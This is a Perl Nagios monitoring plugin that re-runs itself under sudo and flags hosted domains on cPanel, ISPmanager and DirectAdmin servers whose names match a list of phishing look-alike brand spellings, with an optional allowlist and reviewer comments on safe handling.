Current File : /usr/lib64/nagios/plugins/extra/check_phishing_domains
#!/usr/bin/env perl
use extreme;
use File::Slurp;
use File::Basename;
use English;

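# Re-run under sudo when the real user id ($UID, from English) is not root.
# The list form of exec never goes through /bin/sh, so a script path in $0
# that contains spaces or shell metacharacters reaches sudo as one literal
# argument instead of being re-parsed as shell syntax.
# NOTE(review): the matching sudoers rule is not visible here - it should
# name this script by absolute path, and the script should not be writable
# by the monitoring user.  Consider `sudo -n` so an unattended check fails
# fast instead of waiting on a password prompt.
if ( $UID > 0 ) {
    exec( 'sudo', $0 ) or do {

        # exec only returns on failure.  Report UNKNOWN (Nagios exit code 3)
        # rather than falling through and running the checks unprivileged.
        print "UNKNOWN: cannot re-exec via sudo: $!\n";
        exit 3;
    };
}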

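# Brand names, look-alike spellings and marketplace hosts that are treated as
# phishing indicators.  The entries are joined into one alternation and used
# as an unanchored, case-sensitive regex against each hosted domain, so "."
# in an entry matches any character and an entry matches anywhere in the name.
my @phishing_patterns = qw/apple ayyal avito.ru belpost.by blablacar.com blablacar.com.ua blablacar.ru blocket.se byval com- cdek.ru gumtree.com ilcuod
  itunes limitresolve mymarket.ge olx.ua olx.kz olx.bg ozon.ru yandex.ru paepai paeypal paipae paivpail paiy pay.olx pavpai pavpcl pay-pa payal
  payblal payipal payp paypa paypal paypcl payypayl peypal piypyal pyai paypaal steam verification verivication youla.ru/;

my $WLFILE  = '/etc/icinga2/plinc/phishingdomainswl';
my $pattern = join( '|', @phishing_patterns );

# Optional allowlist, one regex per line.  Declared unconditionally:
# "my $x = ... if COND" leaves the variable in an unspecified state when COND
# is false.  Blank lines are dropped, because an empty alternative ("a||b")
# matches every domain and would silently suppress all alerts.
# NOTE(review): entries are unanchored regexes, so a short entry allowlists
# every domain that merely contains it; keep entries specific and the file
# writable by root only.
my $wlpattern;
if ( -f $WLFILE ) {
    my @wl_entries = grep { /\S/ } split( /\n/, read_file($WLFILE) );
    $wlpattern = join( '|', @wl_entries ) if @wl_entries;
}

# Nagios exit status (0 = OK, 2 = CRITICAL) and the findings to print.
my $status = '0';
my @incidents;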

# cPanel: every file under /var/cpanel/users is one account's configuration;
# its DNS<n>= lines list the domains hosted by that account.
if ( -d '/var/cpanel/users' ) {
    ACCOUNT:
    for my $user ( glob '/var/cpanel/users/*' ) {
        my @userconf = read_file($user);

        # Accounts carrying a SUSPENDED=<digit> line are not checked.
        # NOTE(review): \d also matches SUSPENDED=0 - confirm that cPanel
        # never writes that for an active account.
        next ACCOUNT if grep { /^SUSPENDED=\d/ } @userconf;

        for my $domain ( map { /^DNS\d*=(.*)/ } @userconf ) {

            # Allowlisted domains are skipped before the phishing match.
            next if $wlpattern && $domain =~ /$wlpattern/;
            next unless $domain =~ /$pattern/;

            # Reduce the config path to the bare account name for the report.
            $user =~ s|.*/||;
            push @incidents, "$user: possible phishing domain $domain";
            $status = '2';
        }
    }
}

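# ISPmanager 5: list web domains through mgrctl and check each enabled one.
if ( -f '/usr/local/mgr5/sbin/mgrctl' ) {

    # The command contains no shell metacharacters, so Perl runs it directly
    # without /bin/sh; lines ending in "disabled" are filtered below instead
    # of piping through the obsolescent egrep wrapper.
    my @webdomains = `/usr/local/mgr5/sbin/mgrctl -m ispmgr webdomain`;

    # $? is -1 when the command could not be started at all.  Report UNKNOWN
    # (Nagios exit code 3) instead of an "OK" that inspected nothing.
    # NOTE(review): a non-zero mgrctl exit status is still ignored, as before.
    if ( $? == -1 ) {
        print "UNKNOWN: cannot run mgrctl: $!\n";
        exit 3;
    }

    for my $domain_info (@webdomains) {
        next if $domain_info =~ /disabled$/;

        my ($user)   = $domain_info =~ /owner=(.*?)\s/;
        my ($domain) = $domain_info =~ /name=(.*?)\s/;

        # Lines without a name= field carry no domain to inspect.
        next unless defined $domain;
        next if $wlpattern && $domain =~ /$wlpattern/;

        if ( $domain =~ /$pattern/ ) {
            $user = '(unknown owner)' unless defined $user;
            push @incidents, "$user: possible phishing domain $domain";
            $status = '2';
        }
    }
}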

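# DirectAdmin: each directory under data/users is one account holding a
# user.conf and a domains.list (one domain per line).
if ( -d '/usr/local/directadmin' ) {
    my $prefix = '/usr/local/directadmin/data/users';
    for my $list ( glob( "$prefix" . '/*' ) ) {

        # Stray non-directory entries have no per-user files to read.
        next unless -d $list;

        my $user = basename($list);

        # Accounts marked suspended=yes in user.conf are not checked.
        my $suspended = grep { /^suspended=yes/ } read_file("$prefix/$user/user.conf");
        next if $suspended;

        # read_file in list context keeps each line's newline; strip it so
        # the report does not contain blank lines between incidents.
        my @domains = read_file("$prefix/$user/domains.list");
        chomp @domains;

        for my $domain (@domains) {
            next if $wlpattern && $domain =~ /$wlpattern/;
            if ( $domain =~ /$pattern/ ) {
                push @incidents, "$user: possible phishing domain $domain";
                $status = '2';
            }
        }
    }
}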

# Nagios plugin output: one CRITICAL line listing every finding, or OK.
if (@incidents) {
    say 'CRITICAL: ' . join( "\n", @incidents );
}
else {
    say 'OK';
}

# '0' when nothing matched, '2' (CRITICAL) once any incident was recorded.
exit $status;
